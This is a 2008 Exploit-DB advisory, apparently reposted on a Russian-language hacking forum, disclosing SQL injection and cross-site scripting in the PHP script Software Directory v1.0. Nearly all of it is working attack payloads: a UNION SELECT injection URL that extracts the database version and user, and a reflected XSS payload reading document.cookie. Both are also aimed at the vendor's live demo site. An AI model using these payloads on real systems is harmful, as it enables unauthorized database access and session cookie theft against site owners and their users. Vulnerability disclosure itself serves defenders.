Exploit Prozilla Software Directory - Cross-Site Scripting / SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
7027
Проверка EDB
  1. Пройдено
Автор
G4N0K
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2008-11-06
Код:
==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
                      ____   _  _     _   _    ___    _  __
                     / ___| | || |   | \ | |  / _ \  | |/ /
                    | |  _  | || |_  |  \| | | | | | | ' / 
                    | |_| | |__   _| | |\  | | |_| | | . \ 
                     \____|    |_|   |_| \_|  \___/  |_|\_\

==============================================================================
	Software Directory v1.0 (SQL/XSS) Remote SQL Vulnerability
==============================================================================

	[»] Script:             [ Software Directory v1.0 ]
	[»] Language:           [ PHP ]
	[»] Website:            [ http://www.turnkeyforms.com/software-directory.html ]
	[»] Type:               [ Commercial ]
	[»] Report-Date:        [ 06.11.2008 ]
	[»] Founder:            [ G4N0K <mail.ganok[at]gmail.com> ]


===[ XPL ]===

	[ SQLi ]
	[»] http://localhost/[path]/showcategory.php?cid=-24/**/UNION/**/ALL/**/SELECT/**/1,concat(version(),0x3a,user()),3,4,5--


	[ XSS ]
	[»] http://localhost/[path]/signinform.php?msg="><script>alert(document.cookie)</script>




===[ LIVE ]===
	
	[ SQLi ]
	[»] http://demo.turnkeyforms.com/software-directory/showcategory.php?cid=-24/**/UNION/**/ALL/**/SELECT/**/1,concat(version(),0x3a,user()),3,4,5--

	[ XSS ]
	[»] http://demo.turnkeyforms.com/software-directory/signinform.php?msg="><script>alert(document.cookie)</script>

	
===[ Greetz ]===

	[»] ALLAH
	[»] Tornado2800 <Tornado2800[at]gmail.com>
	[»] Hussain-X <darkangel_g85[at]yahoo.com>

	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
	//ALLAH,forgimme...

===============================================================================
exit(); //EoX
===============================================================================

# milw0rm.com [2008-11-06]
 
Источник
www.exploit-db.com

Похожие темы